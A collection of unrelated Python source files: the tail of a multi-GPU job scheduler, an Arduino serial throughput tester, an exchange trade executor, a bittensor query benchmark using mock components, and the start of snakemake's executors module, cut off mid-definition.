currently in K80, but not practically complete K80_promote_list = list(set(step2_job).intersection(list(K80_job.values()))) if K80_free == K80_cap: P100_promote_list = list(set(qualified_job).intersection(list(P100_job.values()))) else: K80_promote_list = list(set(step2_job).intersection(list(K80_job.values()))) # have to finish K80 profiling # look at demote list for gpu, job in V100_job.items(): if job != 'idle' and job in step1_job_V100: if job not in V100_demote_list and job in step2_job and len(ovhd_total[job]) > 0: job_ovhd = np.mean(ovhd_total[job]) # 100 if len(k80_1st[job]) > 0: k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job] else: k80_1st_ovhd = 0 ## print('printing v100_1st ' + job + ' for debugging purpose: ' + str(v100_1st[job])) v100_1st_ovhd = np.mean(v100_1st[job]) - V100_epoch_time[job] demote_qualify_time_V100 = (2 * job_ovhd + k80_1st_ovhd + v100_1st_ovhd) / speedup_dict_V100[job] if int(time.time() - promote_start_time[job]) > max(demote_qualify_time_V100, max(v100_1st[job])): V100_demote_list.append(job) print('job' + job + 'qualified for demote for passing demote qualify time', file=run_log, flush=True) ##str(int(demote_qualify_time))) elif job not in V100_demote_list and job not in step2_job and job in qualified_job: V100_demote_list.append(job) print('job' + job + 'qualified for demote for profiling', file=run_log, flush=True) for gpu, job in P100_job.items(): if job != 'idle' and job in step1_job_P100: if job not in P100_demote_list and job in step2_job and len(ovhd_total[job]) > 0: job_ovhd = np.mean(ovhd_total[job]) # 100 if len(k80_1st[job]) > 0: k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job] else: k80_1st_ovhd = 0 p100_1st_ovhd = np.mean(p100_1st[job]) - P100_epoch_time[job] demote_qualify_time_P100 = (2 * job_ovhd + k80_1st_ovhd + p100_1st_ovhd) / speedup_dict_P100[job] if int(time.time() - promote_start_time[job]) > max(demote_qualify_time_P100, max(p100_1st[job])): P100_demote_list.append(job) print('job' + job + 'qualified for demote for passing demote qualify time', file=run_log, flush=True) ##str(int(demote_qualify_time))) elif job not in P100_demote_list and job not in step2_job and job in qualified_job: P100_demote_list.append(job) print('job' + job + 'qualified for demote for profiling', file=run_log, flush=True) if len(K80_promote_list) > 0 or len(P100_demote_list) > 0 or len(V100_demote_list) > 0: if new_arrival == 0 and K80_free < K80_cap: # all jobs received, jobs still running on K80 promote_list_cpy = K80_promote_list[:] V100_promoted, V100_demoted = max_speedup_promotion_V100(V100_free, promote_list_cpy, V100_demote_list) if len(V100_demoted) > len(V100_promoted): print('should never happen for K80', file=run_log, flush=True) pdb.set_trace() promote_list_cpy = list(set(promote_list_cpy).difference(V100_promoted)) P100_promoted, P100_demoted = max_speedup_promotion_P100(P100_free, promote_list_cpy, P100_demote_list) if len(P100_demoted) > len(P100_promoted): print('should never happen for P100', file=run_log, flush=True) pdb.set_trace() elif new_arrival == 0 and K80_free == K80_cap: # all jobs received, jobs only running on P100 and V100 # when there are free V100s, promote P100 job to V100 V100_promoted, V100_demoted = max_speedup_promotion_P2V(V100_free, P100_promote_list) P100_promoted = [] P100_demoted = [] else: # first demote P100 jobs, then demote V100 jobs P100_demote_list_cpy = P100_demote_list[:] V100_demote_list_cpy = V100_demote_list[:] promote_list_cpy = K80_promote_list[:] P100_promoted, P100_demoted = min_speedup_demotion_P100(promote_list_cpy, P100_demote_list_cpy) promote_list_cpy = list(set(promote_list_cpy).difference(P100_promoted)) V100_promoted, V100_demoted = min_speedup_demotion_V100(promote_list_cpy, V100_demote_list_cpy) P100_demote_list_cpy = list(set(P100_demote_list_cpy).difference(P100_demoted)) V100_demote_list_cpy = list(set(V100_demote_list_cpy).difference(V100_demoted)) # also consider demote newly promoted job to free K80 P100_demote_list_cpy = list(set(P100_demote_list_cpy).union(P100_promoted)) V100_demote_list_cpy = list(set(V100_demote_list_cpy).union(V100_promoted)) have_to_demote = new_arrival - V100_free - P100_free P100_demoted_free, V100_demoted_free = min_speedup_demotion_free(K80_free, P100_demote_list_cpy, V100_demote_list_cpy, have_to_demote) # remove jobs that got demoted back immediately after promotion V100_promoted = list(set(V100_promoted).difference(V100_demoted_free)) P100_promoted = list(set(P100_promoted).difference(P100_demoted_free)) # 1st phase demoted and 2nd phase demote to free V100_demoted = list(set(V100_demoted).union(V100_demoted_free)) P100_demoted = list(set(P100_demoted).union(P100_demoted_free)) # make sure demoted jobs are not already in K80 promote list V100_demoted = list(set(V100_demoted).difference(K80_promote_list)) P100_demoted = list(set(P100_demoted).difference(K80_promote_list)) total_demoted = list(set(V100_demoted).union(P100_demoted)) total_promoted = list(set(V100_promoted).union(P100_promoted)) if len(V100_promoted) > 0: if new_arrival == 0: print('no new job arrivals', file=run_log, flush=True) if K80_free == K80_cap: print('jobs promoted from P100 to V100', file=run_log, flush=True) print('V100 promoted jobs: ', V100_promoted, file=run_log, flush=True) if len(P100_promoted) > 0: if new_arrival == 0: print('no new job arrivals', file=run_log, flush=True) print('P100 promoted jobs: ', P100_promoted, file=run_log, flush=True) if len(V100_demoted) > 0: print('V100 demoted jobs: ', V100_demoted, file=run_log, flush=True) if len(P100_demoted) > 0: print('P100 demoted jobs: ', P100_demoted, file=run_log, flush=True) # stop all promoted jobs on K80 checkpoint_finish_check = [] for gpu, job in K80_job.items(): if job in total_promoted: real_node, real_gpu = K80_LUT(gpu) save_job(real_node, job) if finish_dict['job'+job] != 1: K80_time[job] += int(time.time() - K80_start_time[job]) checkpoint_finish_check.append(job) K80_job[gpu] = 'idle' K80_used -= 1 # stop all demoted jobs on P100 for gpu, job in P100_job.items(): if job in total_demoted: real_node, real_gpu = P100_LUT(gpu) save_job(real_node, job) if finish_dict['job'+job] != 1: P100_time[job] += int(time.time() - P100_start_time[job]) checkpoint_finish_check.append(job) P100_job[gpu] = 'idle' P100_used -= 1 P100_demote_list.remove(job) if new_arrival == 0 and K80_free == K80_cap: # stop all promoted jobs on P100 checkpoint_finish_check = [] for gpu, job in P100_job.items(): if job in total_promoted: real_node, real_gpu = P100_LUT(gpu) save_job(real_node, job) if finish_dict['job'+job] != 1: P100_time[job] += int(time.time() - P100_start_time[job]) checkpoint_finish_check.append(job) P100_job[gpu] = 'idle' P100_used -= 1 # stop all demoted jobs on V100 for gpu, job in V100_job.items(): if job in total_demoted: real_node, real_gpu = V100_LUT(gpu) save_job(real_node, job) if finish_dict['job'+job] != 1: V100_time[job] += int(time.time() - V100_start_time[job]) checkpoint_finish_check.append(job) V100_job[gpu] = 'idle' V100_used -= 1 V100_demote_list.remove(job) # wait for all GPUs to be available if len(checkpoint_finish_check) > 0: while True: time.sleep(5) for job in checkpoint_finish_check[:]: if checkpoint_dict['job'+job] == 1: # checkpoint has finished, gpu is free print(job + ' checkpointed successfully', file=run_log, flush=True) checkpoint_dict['job'+job] = 0 # reset it checkpoint_finish_check.remove(job) # also check if job already finished before sending checkpoint signal elif finish_dict['job'+job] == 1: print(job + ' finished before receiving checkpoint signal', file=run_log, flush=True) checkpoint_finish_check.remove(job) if len(checkpoint_finish_check) == 0: break # give it some time to cleanup old checkpointed jobs time.sleep(3) # resume promoted jobs on V100, make sure the gpu is idle for job_new in V100_promoted[:]: if finish_dict['job'+job_new] != 1: for gpu, job in V100_job.items(): if job == 'idle': # if gpu idle, schedule new job here V100_job[gpu] = job_new real_node, real_gpu = V100_LUT(gpu) resume_job(real_node, real_gpu, job_new) num_mig[job_new] += 1 total_promoted.remove(job_new) V100_used += 1 break else: # job has already finished before checkpointing total_promoted.remove(job_new) # resume promoted jobs on P100, make sure the gpu is idle for job_new in P100_promoted[:]: if finish_dict['job'+job_new] != 1: for gpu, job in P100_job.items(): if job == 'idle': # if gpu idle, schedule new job here P100_job[gpu] = job_new real_node, real_gpu = P100_LUT(gpu) resume_job(real_node, real_gpu, job_new) num_mig[job_new] += 1 total_promoted.remove(job_new) P100_used += 1 break else: # job has already finished before checkpointing total_promoted.remove(job_new) # resume demoted jobs on K80, make sure the gpu is idle for job_new in total_demoted[:]: if finish_dict['job'+job_new] != 1: for gpu, job in K80_job.items(): if job == 'idle': # if gpu idle, schedule new job here real_node, real_gpu = K80_LUT(gpu) resume_job(real_node, real_gpu, job_new) num_mig[job_new] += 1 K80_job[gpu] = job_new total_demoted.remove(job_new) K80_used += 1 break else: # job has already finished before checkpointing print('job'+job_new+' has finished before checkpointing', file=run_log, flush=True) total_demoted.remove(job_new) # perform a check, make sure all promoted/demoted jobs are scheduled if len(total_promoted) > 0 or len(total_demoted) > 0: raise ValueError('Bug with promotion scheme, more jobs than free gpus') ################ submit new jobs to vacant GPUs ############################ if not all_jobs_started: if V100_used < V100_cap: V100_free = V100_cap - V100_used for i in range(V100_free): time_passed = int(time.time() - queue_timer) if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue job_new = str(queue[index]) for gpu, job in V100_job.items(): if job == 'idle': # schedule new job here if idle real_node, real_gpu = V100_LUT(gpu) start_job(real_node, real_gpu, job_new) birthplace[job_new] = real_node measure_job(real_node, real_gpu, job_new) V100_job[gpu] = job_new job_start[job_new] = time.time() queue_delay[job_new] = int(time_passed - queue_dict[queue[index]]) V100_start_time[job_new] = time.time() index += 1 V100_used += 1 time.sleep(5) # don't communicate too often break elif index >= len(queue): all_jobs_started = True if not all_jobs_started: if P100_used < P100_cap: P100_free = P100_cap - P100_used for i in range(P100_free): time_passed = int(time.time() - queue_timer) if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue job_new = str(queue[index]) for gpu, job in P100_job.items(): if job == 'idle': # schedule new job here if idle real_node, real_gpu = P100_LUT(gpu) start_job(real_node, real_gpu, job_new) birthplace[job_new] = real_node measure_job(real_node, real_gpu, job_new) P100_job[gpu] = job_new job_start[job_new] = time.time() queue_delay[job_new] = int(time_passed - queue_dict[queue[index]]) P100_start_time[job_new] = time.time() index += 1 P100_used += 1 time.sleep(5) # don't communicate too often break elif index >= len(queue): all_jobs_started = True ############## monitor GPU usage ############ usage = K80_used + P100_used + V100_used time_stamp = int(time.time() - queue_timer) gpu_usage_time.append(time_stamp) gpu_usage.append(usage) total_completion = np.sum(list(completion.values())) gpu_usage_completion.append(total_completion) ############### wait for next iteration time.sleep(INTERVAL) ################ check if termination condition is met ################ K80_idle_num = sum(value == 'idle' for value in K80_job.values()) P100_idle_num = sum(value == 'idle' for value in P100_job.values()) V100_idle_num = sum(value == 'idle' for value in V100_job.values()) if K80_idle_num == K80_cap and P100_idle_num == P100_cap and V100_idle_num == V100_cap and index == len(queue): print('all jobs are finished!', file=run_log, flush=True) break # get average JCT average_JCT = np.average(list(JCT.values())) JCT['average'] = average_JCT average_overhead = np.average(list(overhead.values())) overhead['average'] = average_overhead average_queue_delay = np.average(list(queue_delay.values())) queue_delay['average'] = average_queue_delay # after everything is finished print('finished all runs', file=run_log, flush=True) JCT_name = testcase + '_JCT.json' overhead_name = testcase + '_overhead.json' num_mig_name = testcase + '_num_mig.json' epoch_waste_name = testcase + '_epoch_waste.json' ckpt_qual_name = 'ckpt_qual.json' finish_name = 'finish.json' K80_time_name = testcase + '_K80_time.json' P100_time_name = testcase + '_P100_time.json' V100_time_name = testcase + '_V100_time.json' gpu_usage_name = testcase + '_gpu_usage.csv' ovhd_a_name = testcase + '_ovhd_a.json' ovhd_b_name = testcase + '_ovhd_b.json' ovhd_c_name = testcase + '_ovhd_c.json' ovhd_d_name = testcase + '_ovhd_d.json' ovhd_total_name = testcase + '_ovhd_total.json' k80_1st_name = testcase + '_k80_1st.json' p100_1st_name = testcase + '_p100_1st.json' v100_1st_name = testcase + '_v100_1st.json' speedup_name_V100 = 'speedup_V100.json' speedup_name_P100 = 'speedup_P100.json' predict_name_V100 = 'predict_V100.json' predict_name_P100 = 'predict_P100.json' V100_demote_list_name = 'V100_demote_list.json' P100_demote_list_name = 'P100_demote_list.json' completion_name = 'completion.json' queue_delay_name = testcase + '_queue_delay.json' birthplace_name = testcase + '_birthplace.json' with open(JCT_name, 'w') as fp1: json.dump(JCT, fp1, sort_keys=True, indent=4) with open(overhead_name, 'w') as fp3: json.dump(overhead, fp3, sort_keys=True, indent=4) with open(num_mig_name, 'w') as fp3: json.dump(num_mig, fp3, sort_keys=True, indent=4) with open(epoch_waste_name, 'w') as fp3: json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4) with open(ckpt_qual_name, 'w') as fp1: json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4) with open(finish_name, 'w') as fp1: json.dump(finish_dict, fp1, sort_keys=True, indent=4) with open(K80_time_name, 'w') as fp3: json.dump(K80_time, fp3, sort_keys=True, indent=4) with open(P100_time_name, 'w') as fp3: json.dump(P100_time, fp3, sort_keys=True, indent=4) with open(V100_time_name, 'w') as fp3: json.dump(V100_time, fp3, sort_keys=True, indent=4) with open(ovhd_a_name, 'w') as fp3: json.dump(ovhd_a, fp3, sort_keys=True, indent=4) with open(ovhd_b_name, 'w') as fp3: json.dump(ovhd_b, fp3, sort_keys=True, indent=4) with open(ovhd_c_name, 'w') as fp3: json.dump(ovhd_c, fp3, sort_keys=True, indent=4) with open(ovhd_d_name, 'w') as fp3: json.dump(ovhd_d, fp3, sort_keys=True, indent=4) with open(ovhd_total_name, 'w') as fp3: json.dump(ovhd_total, fp3, sort_keys=True, indent=4) with open(k80_1st_name, 'w') as fp3: json.dump(k80_1st, fp3, sort_keys=True, indent=4) with open(p100_1st_name, 'w') as fp3: json.dump(p100_1st, fp3, sort_keys=True, indent=4) with open(v100_1st_name, 'w') as fp3: json.dump(v100_1st, fp3, sort_keys=True, indent=4) with open(speedup_name_V100, 'w') as fp1: json.dump(speedup_dict_V100, fp1, sort_keys=True, indent=4) with open(speedup_name_P100, 'w') as fp1: json.dump(speedup_dict_P100, fp1, sort_keys=True, indent=4) with open(predict_name_V100, 'w') as fp1: json.dump(predict_dict_V100, fp1, sort_keys=True, indent=4) with open(predict_name_P100, 'w') as fp1: json.dump(predict_dict_P100, fp1, sort_keys=True, indent=4) with open(V100_demote_list_name, 'w') as fp1: json.dump(V100_demote_list, fp1, sort_keys=True, indent=4) with open(P100_demote_list_name, 'w') as fp1: json.dump(P100_demote_list, fp1, sort_keys=True, indent=4) with open(completion_name, 'w') as fp1: json.dump(completion, fp1, sort_keys=True, indent=4) with open(queue_delay_name, 'w') as fp1: json.dump(queue_delay, fp1, sort_keys=True, indent=4) with open(birthplace_name, 'w') as fp1: json.dump(birthplace, fp1, sort_keys=True, indent=4) gpu_usage_time = np.asarray(gpu_usage_time) gpu_usage = np.asarray(gpu_usage) gpu_usage_completion = np.asarray(gpu_usage_completion) rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion) with open(gpu_usage_name, 'w') as f: writer = csv.writer(f) for row in rows: writer.writerow(row)
serial_talk.py
#!/usr/bin/env python3 import serial import struct from threading import Thread import sys import time import keyboard import crc8 from random import random msg = [0, 0, 0] count = 0 corrupted = 0 wrong_len = 0 # baudrate - msg/sec - isOk # 9600 63 True # 14400 98 True # 19200 129 True # 28800 189 True # 38400 242 True # 57600 318 False (fail on 6586) # 115200 451 False (fail on 6871) serialPort = serial.Serial('/dev/ttyACM0', 9600, timeout=1, write_timeout=5) trigger = False isConnected = False def print_data(): while not trigger: sys.stdout.write( f"\rcount={count}, corrupted={corrupted}, wrong_len={wrong_len}") sys.stdout.flush() time.sleep(0.1) def talk(): global msg, count, wrong_len, response, corrupted printer_thread.start() start = time.perf_counter() while not trigger: # tx byte_array = struct.pack('3f', random(), random(), random()) hash = crc8.crc8() # MUST make new one on each iteration hash.update(byte_array) checksum = hash.digest() serialPort.write(byte_array) serialPort.write(checksum) serialPort.write(b'\n') serialPort.reset_output_buffer() # rx response = serialPort.readline() count += 1 if len(response) == 14: hash = crc8.crc8() # MUST make new one on each iteration hash.update(response[0:12]) checksum = hash.digest() # print(f"msg: {msg}; crc8: p={checksum} | a={bytes([response[12]])}") if checksum == bytes([response[12]]): msg = struct.unpack('3f', response[0:12]) else: corrupted += 1 else: wrong_len += 1 end = time.perf_counter() print(f"\nAverage msg/sec = {count/(end-start)}") arduino_talker_thread = Thread(target=talk) printer_thread = Thread(target=print_data) arduino_talker_thread.start() keyboard.wait('esc') trigger = True arduino_talker_thread.join() printer_thread.join()
execute.py
import time import threading import math from utils.client import auth_from_order from trades.models import OrderTask from exchanges.views import EXCHANGE_APIS from exchanges.abstract import Order from main.models import BotTrade def execute_trade(order): # ISSUE: this is messing with the nonces when there are parallel requests with the same api keys # ISSUE: make sure that 'autofilled' is factored in => affects what trade amount to calculate #balances = api_get("exchanges:user_detail", order.user.auth_token.key, order_params(order))["result"]["balances"] print order.total_trades, order.trades_made try: trade_amount = 1.0 * order.amount_remaining / (order.total_trades - order.trades_made) except ZeroDivisionError: return ex = EXCHANGE_APIS[order.exchange] ticker = ex.pair_ticker(order.trading_pair) if order.autofilled and order.direction == OrderTask.DIRECTION_BUY: trade_amount = 0.98 * trade_amount / ticker.ask if order.direction == OrderTask.DIRECTION_BUY: price = 1.02 * ticker.ask else: price = 0.98 * ticker.bid api_order = Order( order.trading_pair, Order.LIMIT_ORDER, order.direction, floor_amount(trade_amount), price=round_figures(price, 5) ) order_id = ex.order_create(api_order, auth_from_order(order)) print order_id order.trades_made += 1 order.save() def batch_execute(orders): for order in orders: thr = threading.Thread(target=execute_trade, args=(order,), kwargs={}) thr.start() def round_figures(x, n): """Returns x rounded to n significant figures. from https://mail.python.org/pipermail/tutor/2009-September/071393.html """ return round(x, int(n - math.ceil(math.log10(abs(x))))) def floor_amount(x): """Returns x floored to n significant figures. from https://mail.python.org/pipermail/tutor/2009-September/071393.html """ factor = 1000000 return 1.0 * int(x * factor) / factor
__init__.py
#!/bin/python3 # The MIT License (MIT) # Copyright © 2021 Yuma Rao # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated # documentation files (the “Software”), to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all copies or substantial portions of # the Software. # THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO # THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. """ Benchmarking pytest fixture. Example: $ python3 benchmarks/template_miner.py --nucleus.nhid 600 """ import sys import os import pandas as pd import signal import bittensor import time import argparse import multiprocessing as mp import bittensor from rich.console import Console from rich.progress import track from bittensor._wallet import wallet from bittensor._subtensor.subtensor_mock import mock_subtensor # Turns off console output. bittensor.turn_console_off() class QueryBenchmark: r""" Benchmark super class. """ def __init__(self): r""" Start up benchmark background processes. """ mock_subtensor.kill_global_mock_process() self.conf = QueryBenchmark.benchmark_config() bittensor.logging( config = self.conf ) self.subtensor = bittensor.subtensor(_mock=True) self.graph = bittensor.metagraph( subtensor = self.subtensor , _mock=True) self.wallet = bittensor.wallet(_mock=True) self.dendrite = bittensor.dendrite( wallet = self.wallet, multiprocess = False, _mock=True ) self.console = Console() self.log_dir = os.path.expanduser('{}/{}/{}/{}/{}'.format( os.path.dirname(os.path.realpath(__file__)), '/results/', 'mock', 'default', self.miner_name() )) self.console.log( 'Logging to: [bold blue]{}[/bold blue]'.format( self.log_dir ) ) if not os.path.exists(self.log_dir): os.makedirs(self.log_dir) @classmethod def benchmark_config(cls) -> 'bittensor.Config': """ Get config from the argument parser """ parser = argparse.ArgumentParser() cls.add_args( parser = parser ) return bittensor.config( parser ) @classmethod def add_args( cls, parser: argparse.ArgumentParser ): try: parser.add_argument('--n_calls', type=int, help='Number of function calls.', default=100) parser.add_argument('--batch_size', type=int, help='Batch size', default=10) parser.add_argument('--block_size', type=int, help='Block_size', default=10) parser.add_argument('--delay', type=int, help='Message delay', default=0) parser.add_argument('--test_multiprocessing', action='store_true', help='Test with multiprocessing.', default=False) parser.add_argument('--n_processes', type=int, help='Number of process if --test_multiprocessing is True.', default=10) parser.add_argument('--restart_stats', action='store_true', help='If set, clean up old stats', default=False) except argparse.ArgumentError: # re-parsing arguments. pass bittensor.logging.add_args( parser ) @classmethod def help(cls): """ Print help to stdout """ parser = argparse.ArgumentParser() cls.add_args( parser ) print (cls.__new__.__doc__) parser.print_help() @staticmethod def miner_name() -> str: r""" Return miner name """ raise NotImplementedError @staticmethod def run_neuron( config ): r""" To be implemented in the subclass, runs the neuron. Args: config (bittensor.Config) Run config """ raise NotImplementedError @staticmethod def config() -> 'bittensor.Config': r""" Return config Returns: config (bittensor.Config) Run config. """ raise NotImplementedError def _run_background_process(self, run_neuron_func, config_func): r""" Pulls the config and starts the subclass static run method. Args: run_neuron_func (Callable): function which runs neuron. config_func (Callable): function which returns neuron config. """ config = config_func() config.wallet.name = 'mock' config.subtensor.network = 'mock' config.dataset._mock = True config.logging.record_log = True config.logging.logging_dir = 'benchmarks/results/' if not config.logging.debug: sys.stdout = open(os.devnull, 'w') run_neuron_func ( config, self.subtensor,self.graph, self.wallet) def startup(self): r""" Starts mining process. """ self.process = mp.Process( target=self._run_background_process, args=(self.run_neuron, self.config)) self.process.daemon = False self.process.start() self.process.pid def shutdown(self): r""" Terminates the mining process. """ try: self.dendrite.__del__() self.process.terminate() os.kill(self.process.pid, signal.SIGINT) self.process.join( 3 ) except: pass def __del__(self): r""" Tear down benchmark background processes. """ self.shutdown() def find_endpoint(self): r""" Finds the background neuron axon endpoint from the chain. Returns: endpoint (bittensor.Endpoint) endpoint to query for background process. """ start_time = time.time() with self.console.status("Starting miner ..."): while True: if self.wallet.hotkey.ss58_address in self.graph.hotkeys: endpoint = self.graph.endpoint_objs[ self.graph.hotkeys.index( self.wallet.hotkey.ss58_address ) ] if endpoint.ip != '0.0.0.0': break if time.time() - start_time > 100 * bittensor.__blocktime__: print ( 'Failed to make connection to miner, check logs by passing flag --logging.debug') sys.exit() self.graph.sync() time.sleep(bittensor.__blocktime__) self.endpoint = endpoint @staticmethod def dend_forward(args): r""" Handles the dendrite request for the multiproceeing case. Args: wallet (bittensor.Wallet): The wallet for creating dendrite. endpoint (bittensor.endpoint): The enpoint that was being benchmarked on. inputs (tensor): The input tensor. results (mp.manager.list): Where we can store a list of result across processes. """ wallet, endpoint, dataset, n = args dendrite = bittensor.dendrite( wallet = wallet, multiprocess = True ) results = [] for i in range(n): _, codes, qtime = dendrite.forward_text( endpoints = endpoint, inputs = next(dataset) ) results.append([ qtime.item(), codes.item(), time.time()]) return results def query_sequence( self, ncalls:int, batch_size:int, block_size:int ) -> pd.DataFrame: r""" Queries the background neuron with passed parameters Args: ncalls (int): Number of sequential calls made. batch_size (int): Batch size for each request. block_size (int): Sequence length. Returns: history (List[Dict[int, float, int, float)] (n, query_length, code, query_time) tuple """ dataset = bittensor.dataset( _mock = True, batch_size = batch_size, block_size = block_size ) start_time = time.time() self.console.log( 'Running:\n\tqueries: {}\n\tbatch size: {}\n\tblock_length: {}'.format( str(ncalls).ljust(20), str(batch_size).ljust(20), str(block_size).ljust(20) ) ) if self.conf.test_multiprocessing: with mp.Pool(self.conf.n_processes) as p: results_list = p.map(self.dend_forward, [(self.wallet, self.endpoint, dataset, round(self.conf.n_calls / self.conf.n_processes) )]*self.conf.n_processes) results = [] for result in results_list: results += result else: results = [] for i in track(range(ncalls), description="Querying endpoint..."): _, codes, qtime = self.dendrite.forward_text( endpoints = self.endpoint, inputs = next( dataset ) ) results.append( [ qtime.item(), codes.item(), time.time() - start_time ]) time.sleep( self.conf.delay ) df = pd.DataFrame( data = results, columns = ['time', 'code', 'elapsed' ] ) df['n_processes'] = self.conf.n_processes df['n_calls'] = self.conf.n_calls df['batch_size'] = self.conf.batch_size df['block_size'] = self.conf.block_size if 'world_size' in self.config().neuron: df['world_size'] = self.config().neuron.world_size else: df['world_size'] = 1 return df def print_query_analysis( self, history ): r""" Prints analysis from the query trial. """ self.console.print( '\tQPS:\t [bold blue]{}[/bold blue]'.format( str(1/history['time'].mean()).ljust(20) )) self.console.print( '\tSuccess:\t [bold blue]{}[/bold blue]'.format( str( len(history[history.code == 1])/len(history) ).ljust(20) )) print( history.describe() ) def run_standard_benchmark(self): r""" Tests default query sizes """ stats = self.query_sequence( ncalls = self.conf.n_calls, batch_size = self.conf.batch_size, block_size = self.conf.block_size ) self.print_query_analysis( stats ) if self.conf.restart_stats: stats.to_csv( self.log_dir + '/queries.csv' ) else: history = pd.read_csv(self.log_dir + '/queries.csv' , index_col=0) stats = pd.concat([history, stats]) stats = stats.reset_index(drop = True) stats.to_csv( self.log_dir + '/queries.csv' ) def run(self): r""" Runs all funcs with benchmark_ prefix. """ self.startup() self.find_endpoint() self.run_standard_benchmark() for func in dir(self): if callable(getattr(self, func)) and func.startswith("benchmark_"): self.console.log('\nRunning benchmark: [bold blue]{}[/bold blue]'.format(func)) eval('self.' + func + "()") self.console.log('Done\n') self.shutdown()
executors.py
__author__ = "Johannes Köster" __contributors__ = ["David Alexander"] __copyright__ = "Copyright 2015, Johannes Köster" __email__ = "koester@jimmy.harvard.edu" __license__ = "MIT" import os import sys import contextlib import time import datetime import json import textwrap import stat import shutil import shlex import threading import concurrent.futures import subprocess import signal from functools import partial from itertools import chain from collections import namedtuple from tempfile import mkdtemp import random import base64 import uuid from snakemake.jobs import Job from snakemake.shell import shell from snakemake.logging import logger from snakemake.stats import Stats from snakemake.utils import format, Unformattable, makedirs from snakemake.io import get_wildcard_names, Wildcards from snakemake.exceptions import print_exception, get_exception_origin from snakemake.exceptions import format_error, RuleException, log_verbose_traceback from snakemake.exceptions import ProtectedOutputException, WorkflowError, ImproperShadowException, SpawnedJobError from snakemake.common import Mode, __version__, get_container_image, get_uuid def sleep(): # do not sleep on CI. In that case we just want to quickly test everything. if os.environ.get("CIRCLECI") != "true": time.sleep(10) class AbstractExecutor: def __init__(self, workflow, dag, printreason=False, quiet=False, printshellcmds=False, printthreads=True, latency_wait=3): self.workflow = workflow self.dag = dag self.quiet = quiet self.printreason = printreason self.printshellcmds = printshellcmds self.printthreads = printthreads self.latency_wait = latency_wait def get_default_remote_provider_args(self): if self.workflow.default_remote_provider: return ( " --default-remote-provider {} " "--default-remote-prefix {} ").format( self.workflow.default_remote_provider.__module__.split(".")[-1], self.workflow.default_remote_prefix) return "" def run(self, job, callback=None, submit_callback=None, error_callback=None): self._run(job) callback(job) def shutdown(self): pass def cancel(self): pass def _run(self, job): job.check_protected_output() self.printjob(job) def rule_prefix(self, job): return "local " if job.is_local else "" def printjob(self, job): job.log_info(skip_dynamic=True) def print_job_error(self, job, msg=None, **kwargs): job.log_error(msg, **kwargs) def handle_job_success(self, job): pass def handle_job_error(self, job): pass class DryrunExecutor(AbstractExecutor): pass class RealExecutor(AbstractExecutor): def __init__(self, workflow, dag, printreason=False, quiet=False, printshellcmds=False, latency_wait=3, assume_shared_fs=True): super().__init__(workflow, dag, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, latency_wait=latency_wait) self.assume_shared_fs = assume_shared_fs self.stats = Stats() self.snakefile = workflow.snakefile def register_job(self, job): job.register() def _run(self, job, callback=None, error_callback=None): super()._run(job) self.stats.report_job_start(job) try: self.register_job(job) except IOError as e: logger.info( "Failed to set marker file for job started ({}). " "Snakemake will work, but cannot ensure that output files " "are complete in case of a kill signal or power loss. " "Please ensure write permissions for the " "directory {}".format(e, self.workflow.persistence.path)) def handle_job_success(self, job, upload_remote=True, handle_log=True, handle_touch=True, ignore_missing_output=False): job.postprocess(upload_remote=upload_remote, handle_log=handle_log, handle_touch=handle_touch, ignore_missing_output=ignore_missing_output, latency_wait=self.latency_wait, assume_shared_fs=self.assume_shared_fs) self.stats.report_job_end(job) def handle_job_error(self, job, upload_remote=True): job.postprocess(error=True, assume_shared_fs=self.assume_shared_fs, latency_wait=self.latency_wait) def format_job_pattern(self, pattern, job=None, **kwargs): overwrite_workdir = [] if self.workflow.overwrite_workdir: overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir)) overwrite_config = [] if self.workflow.overwrite_configfile: overwrite_config.extend(("--configfile", self.workflow.overwrite_configfile)) if self.workflow.config_args: overwrite_config.append("--config") overwrite_config.extend(self.workflow.config_args) printshellcmds = "" if self.workflow.printshellcmds: printshellcmds = "-p" if not job.is_branched and not job.is_updated: # Restrict considered rules. This does not work for updated jobs # because they need to be updated in the spawned process as well. rules = ["--allowed-rules"] rules.extend(job.rules) else: rules = [] return format(pattern, job=job, attempt=job.attempt, overwrite_workdir=overwrite_workdir, overwrite_config=overwrite_config, printshellcmds=printshellcmds, workflow=self.workflow, snakefile=self.snakefile, cores=self.cores, benchmark_repeats=job.benchmark_repeats if not job.is_group() else None, target=job.get_targets(), rules=rules, **kwargs) class TouchExecutor(RealExecutor): def run(self, job, callback=None, submit_callback=None, error_callback=None): super()._run(job) try: #Touching of output files will be done by handle_job_success time.sleep(0.1) callback(job) except OSError as ex: print_exception(ex, self.workflow.linemaps) error_callback(job) def handle_job_success(self, job): super().handle_job_success(job, ignore_missing_output=True) _ProcessPoolExceptions = (KeyboardInterrupt, ) try: from concurrent.futures.process import BrokenProcessPool _ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool) except ImportError: pass class CPUExecutor(RealExecutor): def __init__(self, workflow, dag, workers, printreason=False, quiet=False, printshellcmds=False, use_threads=False, latency_wait=3, cores=1): super().__init__(workflow, dag, printreason=printreason, quiet=quiet, printshellcmds=printshellcmds, 